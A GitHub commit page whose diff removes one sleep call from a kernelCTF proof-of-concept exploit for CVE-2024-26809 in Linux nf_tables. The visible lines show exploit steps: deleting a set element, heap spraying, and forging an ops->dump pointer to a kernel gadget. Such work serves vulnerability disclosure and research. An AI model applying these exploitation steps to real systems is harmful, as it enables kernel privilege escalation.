Skip to content

Commit 06c9916

Browse files
committed
Solve comments
1 parent c136c67 commit 06c9916

File tree

3 files changed

+0
-1
lines changed

3 files changed

+0
-1
lines changed
Binary file not shown.

pocs/linux/kernelctf/CVE-2024-26809_lts_cos/exploit/cos-105-17412.294.34/exploit.c

-1
Original file line numberDiff line numberDiff line change
@@ -282,7 +282,6 @@ void exploit(struct nl_sock *socket){
282282
//Free the small setelem, and fill it with our target expr->ops->dump and expr->ops->type
283283
//Step 9 : Delete set element `G`.Fill the heap memory of set element `G` through heap spraying.
284284
del_setelem(socket, table, bitmap_set, &bitmap_key, 2, NULL, 0);
285-
sleep(1);//Waiting the function nft_commit_release which finally call nf_tables_set_elem_destroy
286285
//fake ops->dump
287286
*(uint64_t *)&pad[0x40] = kernel_off + LEAVE_RET;
288287
//fake ops->type

0 commit comments

Comments
 (0)